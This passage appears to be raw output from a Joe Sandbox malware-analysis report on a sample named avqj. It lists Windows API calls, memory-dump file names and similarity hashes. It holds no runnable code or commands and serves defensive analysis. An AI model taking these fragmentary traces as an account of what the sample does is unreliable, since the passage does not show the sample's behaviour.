                                                • Part of subcall function 00EEF1A7: Sleep.KERNEL32 ref: 00EEF21F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: FindMessagePostSleepWindow
                                              • String ID: Shell_TrayWnd
                                              • API String ID: 529655941-2988720461
                                              • Opcode ID: f99393a5308b08377df303e0b6d8073919955c496af70c187131ad8d6a085a59
                                              • Instruction ID: c3019a5ed309daa259b552daaa5f5e93dc076d7fccd1af5d41f9782f0f99ac39
                                              • Opcode Fuzzy Hash: f99393a5308b08377df303e0b6d8073919955c496af70c187131ad8d6a085a59
                                              • Instruction Fuzzy Hash: 51D022353C4348BBF228B370DC0FFC67E60AF40B00F410811B309AA0C0CAE0A800D684
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00EBC233
                                              • GetLastError.KERNEL32 ref: 00EBC241
                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00EBC29C
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide$ErrorLast
                                              • String ID:
                                              • API String ID: 1717984340-0
                                              • Opcode ID: 6828b07496b54c2ff732bc4ab9e0e2786b3fd294739c60cb803a8407e30a3ef8
                                              • Instruction ID: c812a3c04f7bdf77257dc61ae72ca928e2f4b2f5d2ed4b03fb4e6759505ac108
                                              • Opcode Fuzzy Hash: 6828b07496b54c2ff732bc4ab9e0e2786b3fd294739c60cb803a8407e30a3ef8
                                              • Instruction Fuzzy Hash: BA41E531608646AFDB218FE5C844AEB7BB5AF4A314F346169FC59BB1B1DB309C01C750